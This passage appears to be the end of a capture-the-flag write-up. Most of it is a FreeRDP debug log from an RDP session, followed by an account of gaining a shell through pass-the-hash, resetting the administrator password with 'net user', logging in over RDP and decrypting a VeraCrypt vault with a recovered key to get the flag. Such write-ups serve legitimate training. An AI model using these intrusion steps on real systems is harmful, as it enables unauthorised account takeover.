0 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecPropertiesLength: 4 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecGuid: 0x [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 2744CCD49D8A4E74803C0ECBEEA19C54 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - (CODEC_GUID_IMAGE_REMOTEFX) [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecId: 0 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecPropertiesLength: 4 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - OrderCapabilitySet (length 84): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsA: 0x000F4240 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveXGranularity: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveYGranularity: 0x0014 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - maximumOrderLevel: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - numberFonts: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderFlags: 0x00AA [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupport: [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - DSTBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - PATBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - SCRBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEMBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - ATEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - AEXTTEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - DRAWNINEGRID: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - LINETO: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTI_DRAWNINEGRID: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - OPAQUE_RECT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - SAVEBITMAP: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - WTEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEMBLT_V2: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT_V2: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIDSTBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIPATBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTISCRBLT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIOPAQUERECT: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_INDEX: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_SC: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_CB: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYLINE: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED23: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_GLYPH: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_SC: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_CB: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_INDEX: 1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WEXTTEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGTEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGEXTTEXTOUT: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED31: 0 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - textFlags: 0x06A1 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupportExFlags: 0x0006 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsB: 0x000F4240 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveSize: 0x000F4240 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsC: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsD: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - textANSICodePage: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsE: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - ColorCacheCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorTableCacheSize: 0x0006 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCacheHostSupportCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - cacheVersion: 0x01 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad1: 0x00 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - PointerCapabilitySet (length 6): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerFlag: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerCacheSize: 0x0019 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pointerCacheSize: 0x0019 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - LargePointerCapabilitySet (length 2): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - largePointerSupportFlags: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84) [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - inputFlags: 0x0175 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardLayout: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardType: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardSubType: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardFunctionKey: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - RemoteProgramsCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - railSupportLevel: 0x0000003F [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowListCapabilitySet (length 7): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - wndSupportLevel: 0x00000002 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - numIconCaches: 0x03 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - numIconCacheEntries: 0x000C [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - DesktopCompositionCapabilitySet (length 2): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - compDeskSupportLevel: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - maxRequestSize: 0x000094A7 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - SurfaceCommandsCapabilitySet (length 8): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - cmdFlags: 0x00000052 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - reserved: 0x00000000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4): [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - frameAcknowledge: 0x00000000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - GeneralCapabilitySet (length 20): [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMajorType: 0x0004 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMinorType: 0x0007 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - protocolVersion: 0x0200 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionTypes: 0x0000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - extraFlags: 0x0415 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - updateCapabilityFlag: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - remoteUnshareFlag: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionLevel: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - refreshRectSupport: 0x01 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - suppressOutputSupport: 0x01 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCapabilitySet (length 24): [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - preferredBitsPerPixel: 0x0010 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive1BitPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive4BitsPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive8BitsPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopWidth: 0x0400 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopHeight: 0x0300 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopResizeFlag: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCompressionFlag: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - highColorFlags: 0x00 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - drawingFlags: 0x0E [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - multipleRectangleSupport: 0x0001 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsB: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - OrderCapabilitySet (length 84): [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsA: 0x00000000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveXGranularity: 0x0001 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveYGranularity: 0x0014 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - maximumOrderLevel: 0x0001 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - numberFonts: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderFlags: 0x00AA [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupport: [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - DSTBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - PATBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - SCRBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEMBLT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - ATEXTOUT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - AEXTTEXTOUT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - DRAWNINEGRID: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - LINETO: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTI_DRAWNINEGRID: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - OPAQUE_RECT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - SAVEBITMAP: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - WTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEMBLT_V2: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT_V2: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIDSTBLT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIPATBLT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTISCRBLT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIOPAQUERECT: 1 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_INDEX: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_SC: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_CB: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYLINE: 1 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED23: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_GLYPH: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_SC: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_CB: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_INDEX: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WEXTTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGEXTTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED31: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - textFlags: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupportExFlags: 0x0004 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsB: 0x00000000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveSize: 0x00038400 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsC: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsD: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - textANSICodePage: 0xFDE9 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsE: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCacheV2CapabilitySet (length 36): [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - cacheFlags: 0x0003 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2: 0x00 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - numCellCaches: 0x05 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache0CellInfo: numEntries: 600 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache1CellInfo: numEntries: 600 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache2CellInfo: numEntries: 2048 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache3CellInfo: numEntries: 4096 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache4CellInfo: numEntries: 2048 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - PointerCapabilitySet (length 6): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerFlag: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerCacheSize: 0x0014 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pointerCacheSize: 0x0014 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84) [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - inputFlags: 0x013D [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardLayout: 0x00000409 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardType: 0x00000004 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardSubType: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardFunctionKey: 0x0000000C [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BrushCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - brushSupportLevel: 0x00000002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - GlyphCacheCapabilitySet (length 48): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache0: Entries: 254 MaximumCellSize: 4 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache1: Entries: 254 MaximumCellSize: 4 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache2: Entries: 254 MaximumCellSize: 8 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache3: Entries: 254 MaximumCellSize: 8 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache4: Entries: 254 MaximumCellSize: 16 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache5: Entries: 254 MaximumCellSize: 32 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache6: Entries: 254 MaximumCellSize: 64 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache7: Entries: 254 MaximumCellSize: 128 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache8: Entries: 254 MaximumCellSize: 256 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache9: Entries: 64 MaximumCellSize: 256 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - fragCache: Entries: 256 MaximumCellSize: 256 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphSupportLevel: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - VirtualChannelCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - flags: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - VCChunkSize: 0x00000640 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - SoundCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - soundFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ShareCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - nodeId: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FontCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - fontSupportFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ControlCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - controlFlags: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - remoteDetachFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - controlInterest: 0x0002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - detachInterest: 0x0002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ColorCacheCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorTableCacheSize: 0x0006 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowActivationCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpKeyIndexFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpExtendedKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - windowManagerKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - LargePointerCapabilitySet (length 2): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - largePointerSupportFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - maxRequestSize: 0x0000FFFF [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - SurfaceCommandsCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - cmdFlags: 0x00000052 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - reserved: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCodecsCapabilitySet (length 1): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCodecCount: 0 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - frameAcknowledge: 0x00000002 [19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32 [19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16 [19:05:54:108] [820544:820545] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem [19:05:54:109] [820544:820545] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd [19:05:55:686] [820544:820545] [INFO][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex resetting error state [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - generalFlags (0x0000001E) { [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_USE_LONG_FORMAT_NAMES [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_STREAM_FILECLIP_ENABLED [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_FILECLIP_NO_FILE_PATHS [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_CAN_LOCK_CLIPDATA [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - }
If everything is correct and the pass-the-hash attack works on the host, we should see a FreeRDP window pop up, like the one below.

Changing password
Since we have access to the command shell and with correct privileges to change the administrator's password, we only need a one-liner command to change the password. To change the administrator's password, issue the net user Administrator enter-your-password-here
command, as shown below.
C:\Windows\system32>net user Administrator password1
C:\Windows\system32>net user Administrator password1 net user Administrator password1 The command completed successfully.
RDP access via password change
We should have access to the desktop environment with this password change. To access the desktop environment, we can use RDP since we see port 3389 (ms-wbt-server) is open.
andrew@kali:~$ rdesktop 172.20.20.37
andrew@kali:~$ rdesktop 172.20.20.37 Autoselecting keyboard map 'en-us' from locale Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. Failed to initialize NLA, do you have correct Kerberos TGT initialized ? Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. Connection established using SSL.
Upon connecting, we see a familiar Windows login screen. In this case, we have to select the other user option and enter SCOVILLE\Administrator
as the username and password1
for the password field. You may ask why I did not pick the first button since it would have done the same thing. Unfortunately, in this case, it was asking for a smart card.

As you can see, the password change worked, and we have access to the desktop environment now.

VeraCrypt
Since we can see the VeraCrypt shortcut on the desktop, we can launch it to get the flag for our CTF event.

It is empty, so we need to figure out where the encrypted data is. Since there is only one hard disk on this host, I decided to look at the root directory. I noticed there is a DATA folder and some files in it.

Upon reading the README.txt file, it confirmed that the VAULT file is the encrypted research data.

Upon reading the README.txt file, it confirmed that the VAULT file is the encrypted research data. We will use this as our input file and the flag from the previous host as the decryption key.

When I used the flag from the previous question, I received an error message. I then decided to input the other key, which is as32.cowboy-quad-powder-solidify. That password worked, as you can see from the screenshot below.

Now that we have successfully decrypted the data, we can finally get the flag. It looks like all we need to do is open the FLAG.txt file, and we will get the flag.

As suspected, the flag is in the text file.

Flag
#8c1515
